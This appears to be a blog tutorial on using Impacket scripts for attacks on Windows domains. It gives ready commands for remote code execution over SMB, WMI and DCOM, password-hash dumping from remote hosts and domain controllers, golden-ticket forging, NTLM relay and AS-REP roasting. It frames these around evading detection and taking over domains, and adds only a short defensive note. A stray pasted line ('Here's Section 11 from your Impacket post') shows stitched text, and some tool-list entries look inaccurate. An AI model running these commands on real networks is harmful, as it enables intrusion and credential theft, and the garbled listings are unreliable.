Impacket for Pentesters: Weaponizing the Protocols
Impacket is a collection of Python classes developed by SecureAuth for working with network protocols. But for pentesters, it’s much more — it’s a Swiss Army knife for abusing Microsoft protocols, performing network attacks, and dumping credentials.
Think of it as a set of ready-made weapons for:
- Authenticated attacks (SMB, RDP, MSSQL, WinRM, etc.)
- Credential dumping and reuse
- Remote code execution
- Lateral movement and domain dominance
Impacket makes the boring stuff look cool and the hard stuff look easy.
Installation
To install Impacket:
git clone https://github.com/fortra/impacket.git
cd impacket
pip install .
Make sure you’re in a Python virtual environment, and have the right dependencies (like python3-dev, pip, etc.).
Most Useful Impacket Scripts for Pentesters
Let’s go over the most useful tools in Impacket — what they do, when to use them, and common usage examples.
1. psexec.py
Remote command execution using SMB and valid credentials.
psexec.py DOMAIN/user:pass@target
# Executes commands as the user remotely using SMB service (like PsExec)
Use when:
- You have valid creds (plaintext, hash, or ticket)
- You want a semi-interactive shell over SMB
2. wmiexec.py
Executes commands via WMI (uses port 135).
wmiexec.py DOMAIN/user:pass@target
# Quieter than psexec, good for evading AV/EDR
Use when:
- You want to fly under the radar
- Psexec or SMB is blocked/logged heavily
3. smbexec.py
Similar to psexec.py but creates a semi-persistent service.
smbexec.py DOMAIN/user:pass@target
# Uses a service-based method, sometimes bypasses command restrictions
Use when:
- You want a more stable shell
- You want another method in your post-exploitation toolkit
4. secretsdump.py
Dumps password hashes from remote systems (SAM, LSA, NTDS.dit).
secretsdump.py DOMAIN/user:pass@target
# Extracts NTLM hashes from a target over SMB
Other usage:
secretsdump.py -system SYSTEM -ntds NTDS.dit -hashes lmhash:nthash LOCAL
# Offline hash extraction
Use when:
- You want credentials to use for pass-the-hash, cracking, or reuse
- You compromise a Domain Controller and want to dump all domain user hashes
5. lookupsid.py
Enumerates users and groups via SID lookups.
lookupsid.py DOMAIN/user:pass@target
# Maps SIDs to names; great for enumeration
Use when:
- You want to discover valid usernames
- Enumerating privilege levels remotely
6. rpcdump.py
Dumps information about exposed RPC services.
rpcdump.py target-ip
# Shows bindings and interfaces for RPC, useful for service discovery
Use when:
- Looking for vulnerable RPC services
- Preparing for targeted abuse of DCOM or other RPC-based services
7. dcomexec.py
Executes commands over DCOM objects.
dcomexec.py DOMAIN/user:pass@target
# Uses Distributed COM for execution
Use when:
- SMB and WMI are locked down
- Bypassing certain EDRs
8. smbclient.py
Acts like a Windows net use — browse SMB shares.
smbclient.py DOMAIN/user:pass@target
# Interactive SMB shell to upload, download, list files
Use when:
- Dumping files from exposed shares
- Uploading payloads
9. ticketer.py
Creates golden/silver tickets (Kerberos attack tool).
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-... -domain corp.local -user Administrator
# Creates a golden ticket
Use when:
- You’ve compromised the
krbtgthash - You want persistence or domain-level access without detection
10. gettgt.py & getST.py
Kerberos ticket requests — for abusing Kerberos.
gettgt.py -dc-ip <DC> domain/user:pass
# Gets a TGT from the KDC
getST.py -dc-ip <DC> -spn service/FQDN domain/user:pass
# Gets a TGS for a specific service
Use when:
- Doing Kerberoasting manually
- Using custom tickets in pass-the-ticket attacks
11. ntlmrelayx.py
Relays NTLM authentication to different protocols.
ntlmrelayx.py -tf targets.txt -smb2support
# Set up a relay server to capture and relay NTLM credentials
Use when:
- You can get a victim to authenticate to your machine (e.g., via Responder)
- Relaying to SMB, LDAP, or HTTP
Here’s Section 11 from your Impacket post, ready to copy and paste:
12. getnpusers.py
Kerberos AS-REP roasting — grabs hashes for users not requiring pre-authentication.
getnpusers.py corp.local/ -no-pass -usersfile users.txt -dc-ip 192.168.56.101
# Dumps crackable AS-REP hashes for users with 'Do not require Kerberos preauthentication'
Use when:
- Enumerating users for password cracking
- Conducting AS-REP roasting attacks against misconfigured accounts
Tips for Real-World Use
- Combine
Responderwithntlmrelayx.pyfor NTLM relay attacks. - Use
secretsdump.pyon a compromised DC to fully own the domain. - Chain tools together in post-exploitation: e.g.,
lookupsid→psexec→secretsdump→ golden ticket withticketer.
Defensive Note
Blue teams should monitor:
- Unusual SMB traffic (135, 445)
- NTLM relay patterns
- LSASS access or DC sync attempts
- Kerberos ticket anomalies
Final Thoughts
Impacket isn’t just a toolkit — it’s a language for network abuse. Learn it well and you’ll move through networks like smoke. Combine it with enumeration, lateral movement, and privilege escalation strategies and you’ve got yourself a full red team stack.
Impacket Toolkit Tools List
| Tool | Description |
|---|---|
| addcomputer.py | Adds a computer to the domain using credentials. Useful for RBCD and delegation attacks. |
| atexec.py | Executes commands on a remote host via Task Scheduler (like PsExec). |
| dcomexec.py | Executes remote commands via DCOM. Alternative lateral movement technique. |
| dpapi.py | Decrypts DPAPI secrets like credentials stored locally on Windows. |
| esentutl.py | Converts Windows .dit database files to CSV (e.g., NTDS.dit extraction). |
| GetADUsers.py | Queries and dumps Active Directory user info via LDAP. |
| GetNPUsers.py | Kerberoasting technique: Gets AS-REP hashes for accounts without pre-auth. |
| GetUserSPNs.py | Kerberoasting: Finds service accounts with SPNs and dumps their TGS hashes. |
| kintercept.py | Captures and displays Kerberos traffic from a target. |
| lookupsid.py | Translates SID to usernames or groups remotely. |
| mimikatz.py | A Python version of mimikatz functions (limited). |
| mqtt_check.py | MQTT protocol testing tool. |
| netview.py | Enumerates shares and sessions on a remote machine (via SMB). |
| nmapAnswerMachine.py | Responds to Nmap probes with fake services (for honeypots/testing). |
| ping.py | ICMP echo requests using pure Python (no system ping dependency). |
| psexec.py | Classic PsExec-like remote command execution over SMB. |
| rbc2attack.py | Exploits Resource-Based Constrained Delegation attack paths. |
| rdp_check.py | Checks if a system has RDP enabled and reachable. |
| reg.py | Interacts with the Windows registry remotely over SMB. |
| rpcdump.py | Dumps RPC endpoints and services from a target. |
| sambaPipe.py | Demonstrates usage of Samba named pipes. |
| samrdump.py | Dumps SAMR info (users, groups, etc.) from remote systems. |
| secretsdump.py | Dumps SAM hashes, LSA secrets, and cached credentials remotely. |
| smbclient.py | CLI SMB client (like smbclient from Samba suite). |
| smbexec.py | Like psexec.py but uses services for command execution (more stealthy). |
| smbrelayx.py | SMB relay attack tool (deprecated in favor of ntlmrelayx.py). |
| sniffer.py | Packet sniffer for sniffing protocols supported by Impacket. |
| sniff.py | Legacy version of sniffer. |
| split.py | Splits PCAP files by session. |
| ticketConverter.py | Converts Kerberos tickets between formats (ccache/Kirbi). |
| ticketer.py | Creates forged Kerberos TGTs/TGSs (Golden/Silver Ticket creation). |
| trafficrelay.py | TCP traffic relay, useful for redirecting connections during attacks. |
| wmiexec.py | Executes commands remotely using WMI (stealthy, no service creation). |
| wmiquery.py | Executes WMI queries against a target. |
| wsdump.py | Dumps WebSocket messages. |
| xdrlib.py | Tool to parse XDR data (less commonly used). |
Most Commonly Used by Pentesters:
secretsdump.pypsexec.py,smbexec.py,wmiexec.py,dcomexec.pyGetNPUsers.py,GetUserSPNs.py,ticketer.py,rbc2attack.pyntlmrelayx.py(most used — comes with its own options)smbclient.pylookupsid.pyreg.py,samrdump.py